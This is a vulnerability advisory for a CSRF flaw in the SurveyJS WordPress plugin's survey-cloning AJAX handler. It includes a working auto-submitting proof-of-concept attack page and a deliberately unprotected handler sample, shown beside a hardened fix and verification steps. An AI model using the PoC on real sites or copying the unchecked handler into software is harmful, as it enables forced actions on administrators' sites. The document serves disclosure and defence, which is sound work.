Atomic Edge analysis of CVE-2025-13205 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the SurveyJS WordPress plugin, affecting versions up to and including 2.5.2. The issue resides in the AJAX handler responsible for cloning surveys. The missing nonce validation allows attackers to trick authenticated administrators into performing unintended actions, leading to unauthorized survey duplication.

Atomic Edge research identifies the root cause as missing nonce verification on the `SurveyJS_CloneSurvey` AJAX action, which the CVE description states explicitly (missing or incorrect nonce validation). The CWE classification of 352 (CSRF) is consistent with this: the handler never verifies that the state-changing request was deliberately issued by the logged-in user rather than triggered by a third-party page. A capability check alone would not close this class of flaw, because the forged request is sent by the browser of a user who already holds the capability; only a nonce (or an equivalent origin check) ties the request to the user's intent.

Exploitation requires the attacker to host a web page (or send a link to one) that makes the victim's browser submit a forged request to the WordPress AJAX endpoint, `/wp-admin/admin-ajax.php`, with the `action` parameter set to `SurveyJS_CloneSurvey` and an identifier for the survey to duplicate (for example `survey_id`; the exact parameter name is not given in the CVE text). The victim must be an authenticated administrator, since `wp_ajax_*` handlers run only for logged-in users and the browser attaches the WordPress auth cookies to the forged request automatically. No nonce parameter is required for the request to be accepted. Two practical caveats: `admin-ajax.php` dispatches on `$_REQUEST['action']`, so if the handler also reads its arguments from `$_REQUEST` or `$_GET`, a plain link or `<img>` tag suffices and no form is needed; and Chromium-based browsers treat cookies that carry no `SameSite` attribute (which includes WordPress auth cookies) as `Lax` by default, so a cross-site top-level POST from those browsers usually arrives without the session cookie (with a narrow exception for freshly set cookies), which narrows the realistic victim set to browsers that do not apply that default.
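The forged request described above, as an added proof-of-concept page an attacker could host (this is illustration code, not part of the advisory or the plugin). Only the `action` value `SurveyJS_CloneSurvey` and the `admin-ajax.php` endpoint come from the CVE text; the target host, the `survey_id` field name and the id value are assumptions. It is a plain PHP template so the target and id can be changed in one place.

```php
<?php
// Added illustration, not from the advisory or the plugin.
// Assumptions: the target hostname, the 'survey_id' parameter name and the
// survey id value. Only action=SurveyJS_CloneSurvey is stated by the CVE text.
// Serve with:  php -S 127.0.0.1:8000 poc.php
// then open it in a browser that is logged in to the target WordPress site.

$target    = 'https://victim.example/wp-admin/admin-ajax.php'; // assumed target
$survey_id = 1;                                                 // assumed existing survey id

header('Content-Type: text/html; charset=utf-8');
?>
<!doctype html>
<html>
<body>
  <!-- A plain HTML form is enough: the browser attaches the victim's
       WordPress auth cookies to the cross-site POST on its own. -->
  <form id="csrf" method="POST" action="<?= htmlspecialchars($target, ENT_QUOTES, 'UTF-8') ?>">
    <input type="hidden" name="action" value="SurveyJS_CloneSurvey">
    <input type="hidden" name="survey_id" value="<?= (int) $survey_id ?>">
    <!-- Deliberately absent: any _ajax_nonce / _wpnonce field. The unpatched
         handler does not ask for one, so the request is processed as-is. -->
  </form>
  <script>
    // Auto-submit so the victim only has to open the page; no click needed.
    document.getElementById('csrf').submit();
  </script>
</body>
</html>
```

When testing against a lab install, watch the response body: the unpatched handler completes the clone, while a handler protected by `check_ajax_referer()` answers `-1` with HTTP 403 because the nonce field is missing. If the form submission arrives without a session cookie at all, the browser's default `SameSite=Lax` handling is the likely reason rather than the plugin.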

Remediation requires adding nonce verification to the `SurveyJS_CloneSurvey` AJAX handler. The patched version, 2.5.3, likely calls `check_ajax_referer()` (the idiomatic choice for `admin-ajax.php` callbacks, since it terminates the request with `-1` and HTTP 403 on failure) or `wp_verify_nonce()` at the top of the callback, which ties the request to a nonce that WordPress minted for the current user's session and for this specific action. The nonce also has to be issued to the plugin's own admin script (for example via `wp_localize_script()`) and sent with every legitimate clone request, otherwise the check breaks the feature. A capability check such as `current_user_can('manage_options')` should sit beside the nonce check to enforce authorization; it is not a substitute for it, because a CSRF victim already holds the capability.
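One way to implement the fix, as an added example that is not the plugin's own code: a reconstruction of the vulnerable handler shape the advisory describes, next to a hardened callback and the enqueue code that issues the nonce to the admin script. The function names, the nonce action string `surveyjs_clone_survey`, the `survey_id` parameter, the capability `manage_options` and the helper `surveyjs_duplicate_survey()` (standing in for the plugin's existing clone routine) are all assumptions; only the AJAX action name comes from the CVE text.

```php
<?php
// Added example, not SurveyJS plugin code. Assumed names: everything except
// the AJAX action 'SurveyJS_CloneSurvey'. surveyjs_duplicate_survey() stands
// in for the plugin's existing clone routine and is not defined here.

// --- Before (CSRF-prone): hooked to wp_ajax_SurveyJS_CloneSurvey in the
// --- unpatched plugin; shown unhooked here so only the hardened one runs.
function surveyjs_clone_survey_vulnerable() {
    $survey_id = isset( $_POST['survey_id'] ) ? absint( $_POST['survey_id'] ) : 0;
    // No nonce and no capability check: a forged cross-site POST riding on an
    // administrator's cookies reaches this line unchallenged.
    $new_id = surveyjs_duplicate_survey( $survey_id );
    wp_send_json_success( array( 'new_id' => $new_id ) );
}

// --- After (hardened) ---
add_action( 'wp_ajax_SurveyJS_CloneSurvey', 'surveyjs_clone_survey_hardened' );

function surveyjs_clone_survey_hardened() {
    // 1. CSRF: require a nonce minted for this action and this user's session.
    //    On a missing or stale nonce, check_ajax_referer() ends the request
    //    with -1 and HTTP 403 (third argument defaults to true = die).
    check_ajax_referer( 'surveyjs_clone_survey', '_ajax_nonce' );

    // 2. Authorization: the nonce proves intent, not privilege. Enforce the
    //    capability separately so lower-privileged accounts cannot clone.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input handling: coerce to a non-negative integer and reject 0.
    $survey_id = isset( $_POST['survey_id'] ) ? absint( wp_unslash( $_POST['survey_id'] ) ) : 0;
    if ( 0 === $survey_id ) {
        wp_send_json_error( array( 'message' => 'Invalid survey id.' ), 400 );
    }

    $new_id = surveyjs_duplicate_survey( $survey_id );
    wp_send_json_success( array( 'new_id' => $new_id ) );
}

// The legitimate admin UI must be able to present the nonce, so it is handed
// to the plugin's admin script. wp_create_nonce() binds the value to the
// current user and session and rotates it on WordPress's tick schedule.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'surveyjs-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'surveyjs-admin', 'surveyjsAdmin', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'surveyjs_clone_survey' ),
    ) );
} );
```

The admin script then posts `action=SurveyJS_CloneSurvey`, `survey_id` and `_ajax_nonce=surveyjsAdmin.nonce` to `surveyjsAdmin.ajaxUrl`. An attacker's page cannot read `surveyjsAdmin.nonce` from the victim's admin session, so the forged form from the exploitation section fails at step 1 before any survey is touched. Verifying the fix is a two-request check: the same POST with the nonce field stripped must return `-1`/403, and with a valid nonce must still clone.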

The impact of successful exploitation is unauthorized duplication of existing surveys. This constitutes an integrity violation (I:L in the CVSS vector). Attackers cannot directly steal data or escalate privileges through this flaw alone. The attack requires user interaction (UI:R) and does not affect confidentiality or availability. Repeated exploitation could clutter a site with duplicate survey content, causing administrative overhead.